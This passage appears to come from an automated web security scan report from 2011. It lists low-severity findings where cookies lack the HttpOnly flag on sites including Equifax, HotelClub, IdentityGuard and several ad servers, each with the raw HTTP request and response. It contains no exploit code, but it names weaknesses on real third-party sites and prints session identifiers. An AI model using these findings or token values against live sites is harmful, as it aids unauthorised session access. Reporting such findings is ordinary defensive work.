<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating with w
...[SNIP]...

14.9. https://www.econsumer.equifax.com/otc/landing.ehtml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/landing.ehtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /otc/landing.ehtml?%255estart=&companyName=cj_esnp3r&AID=10751987&PID=1911961&SID=gid9a%2bidentity%2btheft%2bresource_ordering34--2011-04-23--20-10-04CD1 HTTP/1.1
Host: www.econsumer.equifax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 03:12:19 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=857e5247922609777fdaaf17d37b; Path=/otc; Secure
Set-cookie: JROUTE=ush2; Path=/otc; Secure
Content-Length: 76392


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Per
...[SNIP]...

14.10. http://www.hotelclub.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232704
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: anon=2434808611872011042422094; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=IDCOCPBACOINJJKHPNLDLKKO; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

14.11. http://www.identityguard.com/ipages/le4/styles/ie.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.identityguard.com
Path:   /ipages/le4/styles/ie.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipages/le4/styles/ie.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQASBDART=HKBCAEEBEEDNPAMOIACLELJF; path=/
Date: Sun, 24 Apr 2011 03:11:05 GMT
Content-Length: 92

<script type= "text/javascript"> window.location = "http://www.identityguard.com" </script>

14.12. http://www.lunlizy.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lunlizy.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lunlizy.net

Response

HTTP/1.1 302 Object moved
Date: Sun, 24 Apr 2011 12:43:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: Index.html
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQASRQRR=MEGPOLLBINIIAPFAMNIIPEEG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Index.html">here</a>.</body>

14.13. http://www.nextadvisor.com/link.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.php?kw=blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro&category=security&link=eset&id=305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:10:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=fbb3b93f7303ec3062b1cef62bec6e33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 26

No link for security/eset

14.14. http://2byto.com/bluepixel/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bluepixel/cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303648022

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:24 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Pragma: no-cache
Cache-control: no-cache
Content-Length: 43
Content-Type: image/gif
Set-Cookie: cnsuser_id=-621612133; expires=Tue, 24-Apr-2012 22:59:59 GMT; path=/

GIF89a.............!.......,...........D..;

14.15. http://2byto.com/bluepixel/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bluepixel/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:40:38 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Location: ./cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page
Content-Length: 31
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Set-Cookie: cnscc=1303648838; expires=Tue, 24-Apr-2012 22:59:59 GMT; path=/

<html><body>Moved</body></html>

14.16. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4062
Date: Sun, 24 Apr 2011 12:29:24 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...

14.17. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7N